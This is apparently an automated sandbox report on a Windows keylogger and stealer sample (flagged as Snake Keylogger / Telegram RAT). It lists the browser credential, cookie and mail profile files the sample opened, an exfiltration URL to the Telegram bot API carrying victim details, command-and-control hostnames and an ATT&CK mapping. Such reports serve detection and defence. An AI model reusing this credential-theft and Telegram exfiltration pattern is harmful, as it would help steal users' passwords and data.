            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00405B89 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B89

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3488, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3488, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3488, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		2
            Obfuscated Files or Information            		1
            OS Credential Dumping            		3
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API            		Boot or Logon Initialization Scripts311
            Process Injection            		1
            Software Packing            		LSASS Memory24
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)1
            DLL Side-Loading            		Security Account Manager121
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		11
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Masquerading            		NTDS1
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script51
            Virtualization/Sandbox Evasion            		LSA Secrets51
            Virtualization/Sandbox Evasion            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
            Process Injection            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631823 Sample: uPDwUy9ewY.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 4 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus detection for dropped file 2->48 54 8 other signatures 2->54 8 uPDwUy9ewY.exe 1 29 2->8         started        11 svchost.exe 1 1 2->11         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 30->50 52 Uses the Telegram API (likely for C&C communication) 32->52 process4 dnsIp5 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 14 powershell.exe 30 8->14         started        42 127.0.0.1 unknown unknown 11->42 file6 process7 file8 26 C:\Users\user\AppData\...\uPDwUy9ewY.exe, PE32 14->26 dropped 28 C:\Users\...\uPDwUy9ewY.exe:Zone.Identifier, ASCII 14->28 dropped 60 Early bird code injection technique detected 14->60 62 Writes to foreign memory regions 14->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 14->64 66 3 other signatures 14->66 18 msiexec.exe 15 8 14->18         started        22 conhost.exe 14->22         started        signatures9 process10 dnsIp11 36 checkip.dyndns.com 132.226.247.73, 49692, 49695, 49697 UTMEMUS United States 18->36 38 api.telegram.org 149.154.167.220, 443, 49709 TELEGRAMRU United Kingdom 18->38 40 3 other IPs or domains 18->40 56 Tries to steal Mail credentials (via file / registry access) 18->56 58 Tries to harvest and steal browser information (history, passwords, etc) 18->58 signatures12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            uPDwUy9ewY.exe72%VirustotalBrowse
            uPDwUy9ewY.exe66%ReversingLabsWin32.Backdoor.njRAT
            uPDwUy9ewY.exe100%AviraTR/Injector.bjagk

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe100%AviraTR/Injector.bjagk
            C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dll0%VirustotalBrowse
            C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe66%ReversingLabsWin32.Backdoor.njRAT
            C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe72%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.184.238
            		truefalse
              		high
              drive.usercontent.google.com
              		172.217.16.193
              		truefalse
                		high
                reallyfreegeoip.org
                		104.21.80.1
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		132.226.247.73
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          http://checkip.dyndns.org/false
                            		high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:53:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/ac/?q=msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.orgmsiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/botmsiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://chrome.google.com/webstore?hl=enlB/rmsiexec.exe, 00000005.00000002.2142843540.0000000021EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/pscore6lB/rpowershell.exe, 00000002.00000002.1255613084.0000000004A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000005.00000002.2142843540.0000000021EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://varders.kozow.com:8081msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.commsiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_alldp.icomsiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.google.com/msiexec.exe, 00000005.00000002.2129804635.000000000621A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.office.com/lB/rmsiexec.exe, 00000005.00000002.2142843540.0000000021F0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://apis.google.commsiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1255613084.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://reallyfreegeoip.org/xml/msiexec.exe, 00000005.00000002.2142843540.0000000021D9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.office.com/msiexec.exe, 00000005.00000002.2142843540.0000000021F10000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20amsiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crl.ver)svchost.exe, 00000004.00000002.2128766647.00000233FD600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://ac.ecosia.org?q=msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://drive.usercontent.google.com/msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000004.00000003.1203467438.00000233FD4A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drfalse
                                                                                              		high
                                                                                              http://checkip.dyndns.orgmsiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://chrome.google.com/webstore?hl=en4msiexec.exe, 00000005.00000002.2142843540.0000000021EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://nsis.sf.net/NSIS_ErrorErroruPDwUy9ewY.exe, uPDwUy9ewY.exe.2.drfalse
                                                                                                    		high
                                                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://aborters.duckdns.org:8081msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://g.live.com/odclientsettings/Prod/C:edb.log.4.drfalse
                                                                                                            		high
                                                                                                            https://www.ecosia.org/newtab/v20wmsiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://nsis.sf.net/NSIS_ErroruPDwUy9ewY.exe, uPDwUy9ewY.exe.2.drfalse
                                                                                                                		high
                                                                                                                https://www.office.com/4msiexec.exe, 00000005.00000002.2142843540.0000000021F10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://ion=v4.5powershell.exe, 00000002.00000002.1254568952.0000000000A98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anotherarmy.dns.army:8081msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://duckduckgo.com/chrome_newtabv20msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://drive.usercontent.google.com/Fmsiexec.exe, 00000005.00000002.2129804635.00000000062A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 00000005.00000002.2142843540.0000000021E23000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021E0B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://reallyfreegeoip.orgmsiexec.exe, 00000005.00000002.2142843540.0000000021E23000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021D9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://gemini.google.com/app?q=msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high

                                                                                                                                    World Map of Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public IPs

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    149.154.167.220
                                                                                                                                    		api.telegram.orgUnited Kingdom
                                                                                                                                    		62041TELEGRAMRUfalse
                                                                                                                                    142.250.184.238
                                                                                                                                    		drive.google.comUnited States
                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                    172.217.16.193
                                                                                                                                    		drive.usercontent.google.comUnited States
                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                    104.21.80.1
                                                                                                                                    		reallyfreegeoip.orgUnited States
                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                    132.226.247.73
                                                                                                                                    		checkip.dyndns.comUnited States
                                                                                                                                    		16989UTMEMUSfalse

                                                                                                                                    Private

                                                                                                                                    IP
                                                                                                                                    127.0.0.1

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                    Analysis ID:1631823
                                                                                                                                    Start date and time:2025-03-07 16:18:59 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 7m 2s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:14
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:uPDwUy9ewY.exe
                                                                                                                                    renamed because original name is a hash value
                                                                                                                                    Original Sample Name:567c3776afcd2c7dfb3b07e4c6dd281c0dcdc770ed2827c9a84cccaf3fe97d6c.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/19@5/6
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 97%
                                                                                                                                    • Number of executed functions: 152
                                                                                                                                    • Number of non-executed functions: 63
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                    Warnings

                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.60.203.209
                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    10:19:58API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                                                                    10:20:28API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                    10:20:54API Interceptor14431x Sleep call for process: msiexec.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    149.154.167.220OeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        x8ggp1u7V8.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          mKRflLn5sx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            UOEAjWmusE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                              nGI2U2r41E.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                ckHregxJIq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  PvAmrCZENy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    8JVG9KELay.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      HBL NO C-ACC-250002.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        104.21.80.1DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.rbopisalive.cyou/2dxw/
                                                                                                                                                        Marzec 2025-faktura.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB
                                                                                                                                                        z1companyProfileandproducts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.dd87558.vip/uoki/
                                                                                                                                                        http://7a.ithuupvudv.ruGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 7a.ithuupvudv.ru/favicon.ico
                                                                                                                                                        PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                        • touxzw.ir/scc1/five/fre.php
                                                                                                                                                        dfiCWCanbj.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                        • touxzw.ir/sccc/five/fre.php
                                                                                                                                                        laser (2).ps1Get hashmaliciousFormBookBrowse
                                                                                                                                                        • www.lucynoel6465.shop/jgkl/
                                                                                                                                                        laser.ps1Get hashmaliciousFormBookBrowse
                                                                                                                                                        • www.tumbetgirislinki.fit/k566/
                                                                                                                                                        QUOTATION REQUEST.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.shlomi.app/t3l4/
                                                                                                                                                        Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.askvtwv8.top/uztg/
                                                                                                                                                        132.226.247.73qUG1ZROxLJ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        HT4YGXBRtx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        4LJHFzA8jr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        nGI2U2r41E.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        7l3CafRVv7.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        C6FGS0I3yn.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        ckHregxJIq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        jcHIuFAWdB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        SecuriteInfo.com.Win32.CrypterX-gen.30422.25408.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        z1INVOICE4602-FMT25020147.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        checkip.dyndns.comqUG1ZROxLJ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
